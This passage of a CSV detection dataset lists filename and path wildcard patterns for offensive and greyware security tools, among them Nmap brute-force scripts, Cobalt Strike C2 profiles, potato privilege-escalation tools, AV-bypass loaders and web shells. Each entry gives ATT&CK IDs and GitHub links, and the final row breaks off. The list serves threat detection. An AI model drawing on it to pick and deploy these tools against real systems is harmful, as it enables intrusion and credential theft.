-*/ipmi_passwords.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/ipmi-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ipmi-cipher-zero.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ipmi-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ipscan.exe*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,1,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*/ipscan_*_amd64.deb*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,0,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*/ipscan2-binary/*.exe*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,0,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*/ipscan-any-*.jar*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,0,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*/ipv6-multicast-mld-list.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ipv6-node-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ipv6-ra-flood.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/irc-botnet-channels.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/irc-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/irc-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/irc-sasl-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/irc-unrealircd-backdoor.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/irs.exe*,offensive_tool_keyword,impersonate-rs,Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI,T1134 - T1003 - T1008 - T1071,TA0004 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/zblurx/impersonate-rs,1,1,N/A,N/A,1,77,4,2023-06-15T15:33:49Z,2023-01-30T17:11:14Z -*/iscsi-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/iscsi-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/isns-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ItWasAllADream.git*,offensive_tool_keyword,ItWasAllADream,A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE,T1046 - T1210.002 - T1047,TA0007 - TA0002,N/A,N/A,Discovery,https://github.com/byt3bl33d3r/ItWasAllADream,1,1,N/A,7,8,738,118,2023-08-25T16:11:40Z,2021-07-05T20:13:49Z -*/Ivy/Cryptor*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,1,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -*/Ivy/Loader/*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,1,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -*/jackit*,offensive_tool_keyword,jackit,Wireless Mouse and Keyboard Vulnerability This is a partial implementation of Bastilles MouseJack exploit. See mousejack.com for more details. Full credit goes to Bastilles team for discovering this issue and writing the libraries to work with the CrazyRadio PA dongle. Also. thanks to Samy Kamkar for KeySweeper. to Thorsten Schroeder and Max Moser for their work on KeyKeriki and to Travis Goodspeed. We stand on the shoulders of giants,T1210 - T1212 - T1560 - T1562,TA0002 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/insecurityofthings/jackit,1,0,N/A,N/A,8,756,138,2020-10-01T04:37:00Z,2016-07-01T23:21:56Z -*/jaff.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/jas502n/CVE-2020-5902*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/jas502n/CVE-2020-5902,1,0,N/A,N/A,4,377,112,2021-10-13T07:53:46Z,2020-07-05T16:38:32Z -*/jasperloader.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/java/jndi/RMIRefServer.java*,offensive_tool_keyword,POC,JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.,T1190 - T1133 - T1595 - T1132 - T1046 - T1041,TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001,N/A,N/A,Exploitation tools,https://github.com/welk1n/JNDI-Injection-Exploit,1,1,N/A,N/A,10,2331,715,2023-03-22T21:23:32Z,2019-10-10T01:53:49Z -*/jdwp-exec.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/jdwp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/jdwp-inject.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/jdwp-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/jiansiting/CVE-2020-5902*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/jiansiting/CVE-2020-5902,1,0,N/A,N/A,1,6,5,2020-07-07T02:03:40Z,2020-07-07T02:03:39Z -*/Jira-Lens.git*,offensive_tool_keyword,Jira-Lens,Fast and customizable vulnerability scanner For JIRA written in Python,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/MayankPandey01/Jira-Lens,1,1,N/A,N/A,3,206,31,2022-08-23T09:57:52Z,2021-11-14T18:37:47Z -*/Jira-Lens/*,offensive_tool_keyword,RedTeam_toolkit,Fast and customizable vulnerability scanner For JIRA written in Python,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/MayankPandey01/Jira-Lens,1,1,N/A,N/A,3,206,31,2022-08-23T09:57:52Z,2021-11-14T18:37:47Z -*/JoelGMSec/PyShell*,offensive_tool_keyword,pyshell,PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.,T1059.001 - T1059.002 - T1059.005 - T1059.007,TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/JoelGMSec/PyShell,1,1,N/A,N/A,3,247,56,2023-04-19T14:00:00Z,2021-10-19T07:49:17Z -*/john -*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/john.git*,offensive_tool_keyword,ldapdomaindump,Active Directory information dumper via LDAP,T1087 - T1005 - T1016,TA0007,N/A,N/A,Credential Access,https://github.com/dirkjanm/ldapdomaindump,1,1,N/A,N/A,10,970,176,2023-09-06T05:50:30Z,2016-05-24T18:46:56Z -*/john/run/*.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/john/run/*.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/JohnTheRipper*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/Jormungandr.git*,offensive_tool_keyword,Jormungandr,Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel,T1215 - T1059.003 - T1547.006,TA0004 - TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Idov31/Jormungandr,1,1,N/A,N/A,3,203,23,2023-09-26T18:06:53Z,2023-06-25T06:24:16Z -*/js/stage.js*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/js_inject.txt*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*/juicypotato*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/JuicyPotatoNG.git*,offensive_tool_keyword,JuicyPotatoNG,Another Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/JuicyPotatoNG,1,1,N/A,10,8,703,90,2022-11-12T01:48:39Z,2022-09-21T17:08:35Z -*/Jump-exec/Psexec*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/K8_CS_*_*.rar*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z -*/k8gege/*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*/k8gege/scrun/*,offensive_tool_keyword,cobaltstrike,BypassAV ShellCode Loader (Cobaltstrike/Metasploit),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/scrun,1,1,N/A,10,10,177,76,2019-07-27T07:10:08Z,2019-07-21T15:34:41Z -*/k8gege520*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*/ka7ana/CVE*.ps1*,offensive_tool_keyword,poc,Simple PoC in PowerShell for CVE-2023-23397,T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550,TA0003 - TA0002 - TA0004,N/A,APT28 - STRONTIUM - Sednit - Sofacy - Fancy Bear,Exploitation tools,https://github.com/ka7ana/CVE-2023-23397,1,1,N/A,N/A,1,36,11,2023-03-16T19:29:49Z,2023-03-16T19:10:37Z -*/kali/pool/main/*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/kali-linux-2023*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/kali-tools-*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/katoolin3*,offensive_tool_keyword,katoolin3,Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.,T1203 - T1090 - T1020,TA0006 - TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/s-h-3-l-l/katoolin3,1,1,N/A,N/A,4,315,103,2020-08-05T17:21:00Z,2019-09-05T13:14:46Z -*/kdstab.*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 